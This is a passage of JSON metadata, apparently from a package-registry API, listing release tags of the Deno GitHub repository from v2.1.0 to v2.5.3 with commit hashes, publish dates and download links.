05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/de